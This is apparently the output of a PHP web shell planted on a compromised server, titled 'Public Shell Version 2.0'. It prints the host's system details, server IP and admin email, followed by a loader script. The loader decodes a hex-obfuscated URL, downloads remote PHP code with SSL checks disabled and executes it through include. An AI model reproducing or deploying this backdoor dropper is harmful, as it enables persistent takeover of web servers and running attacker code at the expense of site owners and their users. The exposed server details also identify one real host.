|
Disable Functions: passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source,highlight_file |
Uname : Linux ispc 6.17.4-2-pve #1 SMP PREEMPT_DYNAMIC PMX 6.17.4-2 (2025-12-19T07:49Z) x86_64PHP Version : 5.2.6-1+lenny16Server Admin : webmaster@zednictvi-stastny.euServer IP : 109.105.49.240 Your IP : 216.73.216.136Safe Mode : Safe Mode is OFFRead etc/passwd : Disabled Functions : PHP INFO
Back Connect
';
Public Shell Version 2.0
<?php
$h = '68747470733a2f2f7261772e6769746875622e636f6d2f5a75616e58506c6f69742f546573742f726566732f68656164732f6d61737465722f6261746f7361792e706870';
$f = function ($x) {
$s = '';
for ($i = 0; $i < strlen($x) - 1; $i += 2) {
$s .= chr(hexdec($x[$i] . $x[$i + 1]));
}
return $s;
};
$u = $f($h);
$d = @file_get_contents($u);
if (!$d && function_exists('curl_init')) {
$c = curl_init($u);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
$d = curl_exec($c);
curl_close($c);
}
if ($d) {
$r = tmpfile();
fwrite($r, $d);
fseek($r, 0);
include stream_get_meta_data($r)['uri'];
fclose($r);
} else {
echo "Download gagal.";
}
?>
Public Shell Version 2.0